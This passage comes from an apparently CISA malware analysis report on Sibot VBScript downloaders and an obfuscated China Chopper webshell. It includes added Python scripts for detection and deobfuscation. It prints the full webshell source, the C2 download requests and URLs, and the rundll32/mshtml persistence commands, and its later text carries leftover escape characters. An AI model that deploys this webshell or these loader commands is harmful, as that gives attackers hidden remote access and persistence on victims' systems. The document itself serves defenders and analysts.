"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
"If-Range"
"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\.\ROOT\DEFAULT:STDREGPROV"
"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\.\ROOT\MICROSOFT\HOMENET"
"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"
"PROXYENABLE"
"rundll32 mshidkmdfc.sys,Control_DllRun"
"c:\windows\system32\drivers"
"https[:]//www[.]eyetechltd.com/wp-content/themes/betheme/includes"
"MSXML2.SERVERXMLHTTP.6.0"
"WINHTTP.WINHTTPREQUEST.5.1"
"SELECT * FROM HNET_CONNECTION"
"GET"
--End strings--
Screenshots
Figure 5 - The content of the VBScript used to download a malicious payload from its C2 server.

eyetechltd.com
Tags
command-and-control
URLs
eyetechltd.com/wp-content/themes/betheme/includes
Ports
443 TCP
HTTP Sessions
GET /wp-content/themes/betheme/includes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
If-Range: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Host: www[.]eyetechltd.com
Whois
Domain Name: EYETECHLTD.COM
Registry Domain ID: 135677917_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2020-07-30T09:39:33
Creation Date: 2004-11-23T16:54:52
Registrar Registration Expiration Date: 2022-11-23T16:54:52
Registrar: TUCOWS, INC.
Registrar IANA ID: 69
Reseller: OnDNet Services Ltd
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Msida
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: MT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: https://tieredaccess.com/contact/6e7ea567-7210-4645-a3e9-c430d1ec2730
Registry Admin ID:
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: REDACTED FOR PRIVACY
Registry Tech ID:
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: REDACTED FOR PRIVACY
Name Server: ernest.ns.cloudflare.com
Name Server: marjory.ns.cloudflare.com
DNSSEC: unsigned
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +1.4165350123
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Relationships
eyetechltd.com Connected_From 88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07
Description
prnmngrz.vbs (88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07) attempts to connect to this domain.

a9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f
Tags
bot, downloader, loader, trojan
Details
Name: Final_vbscript.vbs
Size: 12928 bytes
Type: ASCII text, with very long lines, with CRLF line terminators
MD5: 98c8f536eb39821fa4a98e80bbad81af
SHA1: 10b492375c838ce87fc3f2f648de84e3a1443ae6
SHA256: a9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f
SHA512: b894d9b68578d47955665225458ac3727f4d5de5ea6e2e882bb60cc0d4917554d28de85a3489e0f0ec33cbb99b69d2aac3a266e3723baae0
ssdeep: 192:GHne1RISnxSQc6Hv1t7iaLA8G/5c+Cb5E94RqS6S8Mn4jkaA9c1:GHne157i6G/5c+O5e/S6SmkX9c1
Entropy: 4.961650
Antivirus
Microsoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Description
This file contains the de-obfuscated second-stage VBScript (7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb) embedded in the Windows registry value "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot\(Default)". The script is obfuscated and, when executed, collects the connection GUID associated with the LAN connection and the address of a proxy if one is configured on the victim's system. It attempts to download a malicious payload from a C2 server.
Note: The C2 server was identified as a compromised domain and has been redacted for privacy.
The HTTP request header carries the extracted connection GUID in the "X-XSRF-TOKEN" field.
Displayed below is the HTTP request used to download the payload from its C2 server:
--Begin request--
GET /includes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Chromium/78.0.3882.0 Linux
X-XSRF-TOKEN: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9
Host: [Redacted]
--End request--
The payload was not available for analysis. Analysis indicates that the downloaded payload will be installed to "c:\windows\system32\drivers\netioc.sys" and executed with the command below:
--Begin command--
"rundll32 netioc.sys,NdfRunDllDuplicateIPDefendingSystem"
--End command--
Displayed below are sample de-obfuscated strings from the script:
--Begin strings--
"USER-AGENT"
"Chromium/78.0.3882.0 Linux"
"X-XSRF-TOKEN"
"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\.\ROOT\DEFAULT:STDREGPROV"
"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\.\ROOT\MICROSOFT\HOMENET"
"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"
"PROXYENABLE"
"rundll32 mshidkmdfc.sys,Control_DllRun"
"c:\windows\system32\drivers"
"[Redacted C2]"
"MSXML2.SERVERXMLHTTP.6.0"
"WINHTTP.WINHTTPREQUEST.5.1"
"SELECT * FROM HNET_CONNECTION"
"GET"
--End strings--
Screenshots
Figure 6 - The code snippet of the final de-obfuscated VBScript embedded in the Windows registry value "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot\(Default)", used to download the malicious payload from its C2 server.

e9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15
Tags
bot, trojan
Details
Name: rundll32file_schtaskdaily.vbs
Size: 3270 bytes
Type: ASCII text, with very long lines, with CRLF line terminators
MD5: 97306a881289b3c32085d0901b6d08a7
SHA1: 1075639fb7d97ade8bcbe86d38835ac1b71e6237
SHA256: e9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15
SHA512: de4e1aaa87b7b38b831a5450c557c3b22a2866b7fb871af3ac7cdf0c208739e01cd86aa9ef7cfd645d95a3993f5f6eefdbe513e8d2af4812a32
ssdeep: 96:yG/J/WXQGApwj3Fv2tOiFbTLyD1rvdr1dD2PVLFi+:yG/RWXIw1EpTLa1rFr1KLFi+
Entropy: 5.622366
Antivirus
Microsoft Security Essentials Trojan:VBS/Sibot.B!dha
YARA Rules
rule CISA_3P_10327841_04 : SIBOT trojan bot vbscript
{
   meta:
       Author = "CISA Trusted Third Party"
       Incident = "10327841"
       Date = "2021-03-26"
       Actor = "n/a"
       Category = "Trojan BOT VBScript"
       Family = "SIBOT"
       Description = "Detects Scheduled Task persistence for sibot variant AikCetnrll"
   strings:
       $a1 = "Actions.Create" fullword ascii
       $a2 = "RegistrationInfo" fullword ascii
       $a3 = "StartWhenAvailable" fullword ascii
       $z1 = "\\Microsoft\\Windows\\CertificateServicesClient" fullword ascii
       $z2 = "CreateObject(\"Schedule.Service\")" fullword ascii
       $z3 = "c:\\windows\\system32\\printing_admin_scripts\\en-us\\prndrvrn.vbs" fullword ascii
       $z4 = "AikCetnrll" fullword ascii
       $z5 = "This task enrolls a certificate for Attestation Identity Key" fullword ascii
   condition:
       (3 of ($a*) and 5 of ($z*))
}
ssdeep Matches
No matches found.
Description
"Rundll32file_schtaskdaily.vbs" is a VBScript that creates a scheduled task that executes "prndrvrn.vbs" (cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c) daily. The file "prndrvrn.vbs" is a variant of the Sibot obfuscated VBScript malware.
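The YARA rule above matches the persistence script itself. The task it registers can be found independently, because both Sibot persistence variants share one action: rundll32 is handed a "vbscript:" URL that resolves mshtml's RunHTMLApplication export and then Execute()s script text fetched from the registry or from a file on disk. The Python below is an added example and not part of the CISA report. It parses scheduled-task XML, flags that action, reports where the script text comes from, and walks a Tasks directory; its sample input is the WindowsUpdate task XML from earlier in this report (trimmed to the elements read, with its quote escapes resolved), a file-read variant constructed from the prndrvrn.vbs path listed in the rule above, and a constructed benign task. The function names (triage_task_xml, scan_tasks_dir) are this example's own; the task-schema namespace is the real one that the report prints defanged.

```python
"""Triage Windows scheduled-task XML for the SIBOT rundll32/mshtml loader action.
Added example; not part of the CISA report."""
import os
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Real Task Scheduler schema namespace (the report prints it defanged as hxxp[:]//).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# The loader both persistence variants share: rundll32 + vbscript: URL that loads
# mshtml's RunHTMLApplication, then Execute() on script text from the registry
# (RegRead) or from a file on disk (OpenTextFile).
LOADER_RE = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)
SOURCE_RES = {
    "registry": re.compile(r"\.RegRead\s*\(", re.IGNORECASE),
    "file": re.compile(r"\.OpenTextFile\s*\(", re.IGNORECASE),
}
# The declaration is dropped so the UTF-16 encoding it names cannot conflict
# with text that has already been decoded to str.
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def _text(node: ET.Element, path: str) -> str:
    return (node.findtext(path, default="", namespaces=TASK_NS) or "").strip()


def triage_task_xml(xml_text: str) -> Optional[Dict[str, str]]:
    """Return details of the first suspicious <Exec> action, or None if clean."""
    root = ET.fromstring(XML_DECL_RE.sub("", xml_text, count=1))
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = _text(exec_node, "t:Command")
        args = _text(exec_node, "t:Arguments")
        if "rundll32" not in command.lower() or "vbscript:" not in args.lower():
            continue
        if not LOADER_RE.search(args):
            continue
        source = next((k for k, rx in SOURCE_RES.items() if rx.search(args)), "unknown")
        return {
            "command": command,
            "script_source": source,
            "hidden": _text(root, ".//t:Settings/t:Hidden"),
            "run_level": _text(root, ".//t:Principals/t:Principal/t:RunLevel"),
        }
    return None


def scan_tasks_dir(root_dir: str) -> List[Tuple[str, Dict[str, str]]]:
    """Walk a Tasks directory (e.g. C:\\Windows\\System32\\Tasks). Task files are
    UTF-16 with a BOM on disk; unreadable or unparsable files are skipped."""
    hits: List[Tuple[str, Dict[str, str]]] = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read()
                if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
                    text = raw.decode("utf-16")
                else:
                    text = raw.decode("utf-8", "replace")
                result = triage_task_xml(text)
            except (OSError, ET.ParseError, UnicodeDecodeError):
                continue
            if result:
                hits.append((path, result))
    return hits


# Task XML from the report (the WindowsUpdate task of the registry variant),
# reduced to the elements the triage reads, with its quote escapes resolved.
SIBOT_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger id="DailyTriggerId"><StartBoundary>2021-03-12T18:27:56</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><StartWhenAvailable>true</StartWhenAvailable><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>rundll32</Command>
    <Arguments>vbscript:"\\..\\mshtml,RunHTMLApplication"+Execute(CreateObject("WScript.Shell").RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\\"))(window.close)</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed: the file-read action of the AikCetnrll variant, using the
# prndrvrn.vbs path from the CISA rule.
FILE_VARIANT_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>rundll32</Command>
    <Arguments>vbscript:"\\..\\mshtml,RunHTMLApplication"+Execute(CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\\windows\\system32\\printing_admin_scripts\\en-us\\prndrvrn.vbs").ReadAll())(window.close)</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign task: rundll32 with an ordinary "dll,entrypoint" argument.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec><Command>%windir%\\system32\\rundll32.exe</Command>
    <Arguments>example.dll,ExampleEntry</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_doc in (("report task", SIBOT_TASK_XML), ("file variant", FILE_VARIANT_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, triage_task_xml(xml_doc))
```

Pair the file scan with Task Scheduler Operational Event ID 140 (task updated) and 106 (task registered) so that a task written directly to the Tasks folder and one registered through the API are both covered.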
Despite not containing the string "sibot" at all, both "rundll32file_schtaskdaily.vbs" and "prndrvrn.vbs" are clearly related to existing Sibot samples as reported on by Microsoft and Mandiant, because the form, function, and obfuscation algorithms of the scripts are identical. The files differ slightly in specific details of the scheduled task. "Rundll32file_schtaskdaily.vbs" is similar to variant B per previous Microsoft reporting. The only difference is that the scheduled task points to a file on disk instead of the registry. See the analyst notes at the end of the report for further details on the variations.
When run without admin credentials, the Windows Script Host displays a pop-up with a "Permission denied" error. When run with admin credentials, the rundll32file_schtaskdaily.vbs script begins running inside the WScript.exe process.
The WScript.exe process creates a scheduled task similar to AikCertEnrollTask, a legitimate task:
Task Name: AikCetnrll
Location: \Microsoft\Windows\CertificateServicesClient
Also found on disk in: C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\AikCetnrll
Description: This task enrolls a certificate for an Attestation Identity Key. (Same as AikCertEnrollTask)
Credentials: NT AUTHORITY\SYSTEM
Security Options: Run with highest privileges; run whether user is logged on or not; hidden.
The task is set to run every day, five minutes after the time the script was first run.
For example, if the script was run at 14:00, the scheduled task will run every day at 14:05.
The task executes rundll32.exe inside a svchost.exe with the arguments:
vbscript:"\..\mshtml,RunHTMLApplication"+Execute(CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\windows\system32\printing_adm
us\prndrvn.vbs").ReadAll())(window.close)
This ultimately runs prndrvrn.vbs from "C:\Windows\System32\Printing_Admin_Scripts\en-us\" daily with SYSTEM-level privileges.
This also means that prndrvrn.vbs must be placed inside the "en-us" folder in order for the scheduled task to run properly.
All variables and Task Scheduler Scripting Objects are obfuscated, but can be determined by referencing Microsoft's Task Scheduler Scripting Objects documentation.
Strings of interest:
--Begin strings of interest--
StartWhenAvailable
Hidden
DateAdd
StartBoundary
Id
Enabled
ExecutionTimeLimit = "PT10M"
.Actions.Create(
Schedule.Service
\Microsoft\Windows\CertificateServicesClient
This task enrolls a certificate for Attestation Identity Key.
DailyTriggerId
.Paths = "rundll32"
.Arguments = "vbscripts:""\..mshtml,RunHTMLApplication""Execute(CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""c:\windows\system32\printing_admin_scripts\en-us\prndrvrn.vbs"").ReadAll()(window.close)"
RegisterTaskDefinition( "AikCetnrll"
NT AUTHORITY\SYSTEM
--End strings of interest--
The script needs administrator privileges to run correctly.
The Task Name is different from previously reported Sibot samples:
   AikCetnrll
The Task Location is different from previously reported Sibot samples:
   Task Scheduler Library > Microsoft > Windows > CertificateServicesClient
   or
   C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient
The Task Description is different from previously reported Sibot samples:
   "This task enrolls a certificate for Attestation Identity Key"
The Scheduled Task Action is different from previously reported Sibot samples.
The Task Trigger is the same and executes five minutes after the initial script runtime.
Task Scheduler Operational Event ID 140: User "NT AUTHORITY\SYSTEM" updated Task Scheduler task "\Microsoft\Windows\CertificateServicesClient\AikCetnrll".

cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c
Tags
bot, downloader, loader, trojan
Details
Name: prndrvrn.vbs
Size: 13110 bytes
Type: ASCII text, with very long lines, with CRLF line terminators
MD5: a16f6291e6096cfc2cc901050b922b9e
SHA1: 1798d1b45d9dd8c5afd4b0a43490233f61864da3
SHA256: cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c
SHA512: 260b88a05d9404efce4611a6576e7fddd76b1f92087ccc0c5d8ae757c939e4fc463a35a2f2c19317f64fa9aa4dbbdb24b7adb2fd48d5a91948
ssdeep: 192:ZTq3D3xkQN1myNlxlmuAp5m2MFSeG7+sh1Nqfu3oLixCeSezjYxAb:ZTFC8oN7KV3oLixHSezkAb
Entropy: 4.949764
Antivirus
Microsoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Relationships
cb80a074e5... Connected_To sense4baby.fr
Description
This file, "prndrvrn.vbs", is a VBScript that performs a DNS query for sense4baby.fr followed by an HTTPS (TLS 1.2) connection. It is designed to download a payload, store it as a .sys file, and execute it. Prndrvrn.vbs is a variant of the Sibot obfuscated VBScript malware. Despite not containing the string "sibot", both rundll32file_schtaskdaily.vbs and prndrvrn.vbs are clearly related to existing Sibot samples as reported on by Microsoft and Mandiant, because the form, function, and obfuscation algorithms of the scripts are identical.
They differ slightly in specific details of the scheduled task. Prndrvrn.vbs is variant C as described in Microsoft's reporting.
Prndrvrn.vbs variables and .NET functions are obfuscated. The variable and function names can be de-obfuscated by comparing the structures and purposes of the functions to .NET documentation to determine what they represent. The strings in the program are obfuscated by an encoding function found towards the end of the script.
The script can run with or without administrator permissions. However, the other scripts used for persistence (rundll32file_schtaskdaily.vbs) run prndrvrn.vbs with SYSTEM-level privileges.
When run, prndrvrn.vbs starts inside Wscript.exe and immediately performs a DNS query for sense4baby.fr. After receiving a response it begins setting up a TLS 1.2 connection. Previous reporting indicates the script tries to pull a .sys file from the URL hxxps[:]//sense4baby.fr/sites/default/files/styles with an HTTPS GET request.
After receiving the .sys file, prndrvrn.vbs executes it. Further analysis is not possible without a copy of the .sys file the script is requesting; however, the script appears identical to the Microsoft-reported Sibot Variant C except for the domain name, payload name, and payload path.
According to Microsoft reporting, the .sys file downloaded by Sibot Variant C is actually a .dll file with the extension changed to .sys to obfuscate its true nature.
Network Artifacts
   ("rundll32 wudfrdm.sys,ExecuteScheduledSPPCreation","c:\windows\system32\drivers","hxxps[:]//sense4baby.fr/sites/default/files/styles","GET")
The intended purpose is to reach out and download the file wudfrdm.sys from "hxxps[:]//sense4baby.fr/sites/default/files/styles" into the folder C:\windows\system32\drivers via an HTTP GET request.
Observed in network traffic:
   User Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   GUID String: "{068B2FE5-EB56-EE50-7A0C-10114EA138E3}"

sense4baby.fr
Tags
command-and-control
URLs
sense4baby.fr/sites/default/files/styles
Whois
domain:      sense4baby.fr
status:      ACTIVE
hold:        NO
holder-c:    IANB3-FRNIC
admin-c:     IANB3-FRNIC
tech-c:      FK3162-FRNIC
zone-c:      NFC1-FRNIC
nsl-id:      NSL5536-FRNIC
dsl-id:      SIGN1631703-FRNIC
registrar:   HOSTING CONCEPTS B.V.
Expiry Date: 2021-07-16T14:47:29Z
created:     2019-07-16T14:47:29Z
last-update: 2020-07-14T13:07:16Z
source:      FRNIC
ns-list:     NSL5536-FRNIC
nserver:     ns1.openprovider.nl
nserver:     ns2.openprovider.be
nserver:     ns3.openprovider.eu
source:      FRNIC
ds-list:     SIGN1631703-FRNIC
key1-tag:    19594
key1-algo:   8 [RSASHA256]
key1-dgst-t: 2 [SHA-256]
key1-dgst:   F144A808B4B16BAF5D9998B8A4153C6C405A967007BD4DACE2C60A4D8A0C36C2
source:      FRNIC
registrar:   HOSTING CONCEPTS B.V.
type:        Isp Option 1
address:     Kipstraat 3c-5c
address:     3011RR ROTTERDAM
country:     NL
phone:       +31 10 448 2299
fax-no:      +31 10 244 0250
e-mail:      sales@openprovider.com
website:     https://www.openprovider.com
anonymous:   NO
registered:  2005-07-01T12:00:00Z
source:      FRNIC
nic-hdl:     IANB3-FRNIC
type:        ORGANIZATION
contact:     ICT Automatisering Nederland B.V.
address:     ICT Automatisering Nederland B.V.
address:     Munsterstraat 7
address:     7418 EV Deventer
country:     NL
phone:       +31.889082344
registrar:   HOSTING CONCEPTS B.V.
changed:     2019-01-07T13:52:22Z nic@nic.fr
anonymous:   NO
obsoleted:   NO
eligstatus:  ok
eligsource:  REGISTRAR
eligdate:    2021-02-08T15:58:27Z
reachmedia:  email
reachstatus: ok
reachsource: REGISTRAR
reachdate:   2021-02-08T15:58:27Z
source:      FRNIC
nic-hdl:     IANB3-FRNIC
type:        ORGANIZATION
contact:     ICT Automatisering Nederland B.V.
address:     ICT Automatisering Nederland B.V.
address:     Munsterstraat 7
address:     7418 EV Deventer
country:     NL
phone:       +31.889082344
registrar:   HOSTING CONCEPTS B.V.
changed:     2019-01-07T13:52:22Z nic@nic.fr
anonymous:   NO
obsoleted:   NO
eligstatus:  ok
eligsource:  REGISTRAR
eligdate:    2021-02-08T15:58:27Z
reachmedia:  email
reachstatus: ok
reachsource: REGISTRAR
reachdate:   2021-02-08T15:58:27Z
source:      FRNIC
nic-hdl:     FK3162-FRNIC
type:        PERSON
address:     ICT Automatisering Nederland B.V.
address:     Munsterstraat 7
address:     7418 EV Deventer
country:     NL
phone:       +31.889082344
registrar:   HOSTING CONCEPTS B.V.
changed:     2019-01-07T13:52:23Z nic@nic.fr
anonymous:   NO
obsoleted:   NO
eligstatus:  ok
eligsource:  REGISTRAR
eligdate:    2021-02-08T15:58:28Z
reachmedia:  email
reachstatus: ok
reachsource: REGISTRAR
reachdate:   2021-02-08T15:58:28Z
source:      FRNIC
Relationships
sense4baby.fr Connected_From cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c
Description
prndrvrn.vbs (cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c) attempts to connect to this domain.

0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116
Tags
webshell
Details
Name: owafont.aspx
Size: 377 bytes
Type: ASCII text, with very long lines, with no line terminators
MD5: 4bb694523bed3645a1671fa7c6ff0dfb
SHA1: ad1e0abbb592edf7102c2dbcc9bf99e6fe742d29
SHA256: 0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116
SHA512: 080b8bd560244427b77428e66558d0fd0c5a3feac735d5be5fc028bcab7b5cf7066674b54c81375f5291210d6bfb2afa7eb493a62f33e9a5b5
ssdeep: 6:aEm70Vqp9skhXxFTrI8LwgHluPkcuG6LNSkbnKRWRt7GTS+3fGlEc39BDz:u70V4XDTrIwwgHlubyNSkhzQ3vGm6/
Entropy: 5.292561
Antivirus
No matches found.
YARA Rules
rule CISA_3P_10327841_03 : CHINACHOPPER webshell
{
   meta:
       Author = "CISA Trusted Third Party"
       Incident = "10327841"
       Date = "2021-03-26"
       Actor = "n/a"
       Category = "Webshell"
       Family = "CHINACHOPPER"
       Description = "Detects iteration of China Chopper webshell server-side component"
   strings:
       $first_bytes = "<%"
       $replace = ".Replace(\"/*/\",\"\")" nocase
       $eval = "eval" nocase
       $toString = "tostring" nocase
       $length = "length" nocase
   condition:
       all of them
}
ssdeep Matches
No matches found.
Description
This file is an iteration of the China Chopper webshell server-side component. It has been customized and obfuscated to avoid string-based signature or rule detection. The webshell was observed being placed on a network with an active SUNSHUTTLE/GoldMax infection.
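How the obfuscation is undone, as an added example that is not part of the CISA report: the sample (listed in full under "original script" further on) builds its strings by reversing them and padding them with "/*/", which is why the CISA rule above keys on the .Replace("/*/","") call rather than on the words the shell needs. The Python below embeds the sample's source as it appears in this report, replays the sample's own reversal helper and its two string expressions, recovers the eval target and the eval mode, and shows which plain literals a string rule would and would not find in the file. The names deobfuscate_owafont, decode, request_parameter and literal_hits are this example's own.

```python
"""Undo the owafont.aspx string obfuscation (string reversal plus "/*/" filler).
Added example; not part of the CISA report."""
import re
from typing import Dict, Optional, Sequence

FILLER = "/*/"

# The sample as listed in the report, embedded so the checks below run against
# the actual obfuscated source.
OWAFONT_ASPX = r'''<%@ Page Language="Jscript"%>
<% function ByzjwD(s){
var Ewl = s.Length; var Jcw = "";
for(var i = Ewl - 1; i >= 0; i--){
var Jcw = Jcw + s[i].ToString();
} return Jcw;
}
var Yhb = ByzjwD("]/*/\"" + ByzjwD("2lAbF7ap6So4T0G") + "\"/*/[me/*/t/*/I/*/./*/ts/*/eu/*/qe/*/R/*/").Replace("/*/","");
var Vzc = ByzjwD("e/*//*/f/*/as/*/nu/*/").Replace("/*/","");
eval(eval(Yhb,Vzc),Vzc);
%>'''


def byzjwd(s: str) -> str:
    """Python equivalent of the sample's ByzjwD() helper: reverse the string."""
    return s[::-1]


def decode(obfuscated: str) -> str:
    """One obfuscated literal to plaintext, in the sample's order: reverse first,
    then drop the "/*/" filler (its .Replace("/*/","") call)."""
    return byzjwd(obfuscated).replace(FILLER, "")


def deobfuscate_owafont() -> Dict[str, str]:
    """Replay the sample's two string expressions. The inner ByzjwD() on the
    parameter name is undone by the outer one, so that literal is kept as written."""
    yhb = decode(']/*/"' + byzjwd("2lAbF7ap6So4T0G") + '"/*/[me/*/t/*/I/*/./*/ts/*/eu/*/qe/*/R/*/')
    vzc = decode("e/*//*/f/*/as/*/nu/*/")
    return {
        "eval_target": yhb,
        "eval_mode": vzc,
        "reconstructed": f"eval(eval({yhb}, {vzc}), {vzc})",
    }


PARAM_RE = re.compile(r'Request\.Item\["([^"]+)"\]')


def request_parameter(eval_target: str) -> Optional[str]:
    """Name of the request field the webshell evaluates; the value to search
    for in IIS request logging or a WAF rule."""
    m = PARAM_RE.search(eval_target)
    return m.group(1) if m else None


def literal_hits(text: str, words: Sequence[str] = ("Request", "unsafe", "eval", '.Replace("/*/","")')) -> Dict[str, bool]:
    """Case-insensitive presence check: which literals a plain string rule would find."""
    low = text.lower()
    return {w: (w.lower() in low) for w in words}


if __name__ == "__main__":
    result = deobfuscate_owafont()
    print(result["reconstructed"])
    print("request parameter:", request_parameter(result["eval_target"]))
    print("literals present in obfuscated source:", literal_hits(OWAFONT_ASPX))
```

Running literal_hits over the embedded source shows "Request" and "unsafe" absent while "eval" and the .Replace("/*/","") call are present, which is the coverage gap the CISA rule's string set closes.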
The webshell would provide the actor with an alternative method of accessing the\r\nnetwork if the SUNSHUTTLE/GoldMax infection was remediated.\r\nThe main command executed is:\r\neval(eval(Request.Item[G0T4oS6pa7FbAl2], unsafe)unsafe)\r\nThe components of this string have been obfuscated in two ways:\r\n1. The strings have been reversed. There is a function in the script that will reverse these upon execution.\r\n2. \"/*/\" strings have been inserted at various points in the strings. This will prevent any signature detection on words such\r\nas \"Request\" or \"unsafe\".\r\nNote: The name “China Chopper” does not positively indicate Chinese attribution to this sample; it is merely the name of a\r\ncommon web shell which was first used by Chinese APT groups but has since been used by many actors. Attribution of this\r\nsample is not discussed in this report.\r\n--Begin original script--\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\r\n\u003c% function ByzjwD(s){\r\nvar Ewl = s.Length; var Jcw = \"\";\r\nfor(var i = Ewl - 1; i \u003e= 0; i--){\r\nvar Jcw = Jcw + s[i].ToString();\r\n} return Jcw;\r\n}\r\nvar Yhb = ByzjwD(\"]/*/\\\"\" + ByzjwD(\"2lAbF7ap6So4T0G\") + \"\\\"/*/[me/*/t/*/I/*/./*/ts/*/eu/*/qe/*/R/*/\").Replace(\"/*/\",\"\");\r\nvar Vzc = ByzjwD(\"e/*//*/f/*/as/*/nu/*/\").Replace(\"/*/\",\"\");\r\neval(eval(Yhb,Vzc),Vzc);\r\n%\u003e\r\n--End original script--\r\nRelationship Summary\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. 
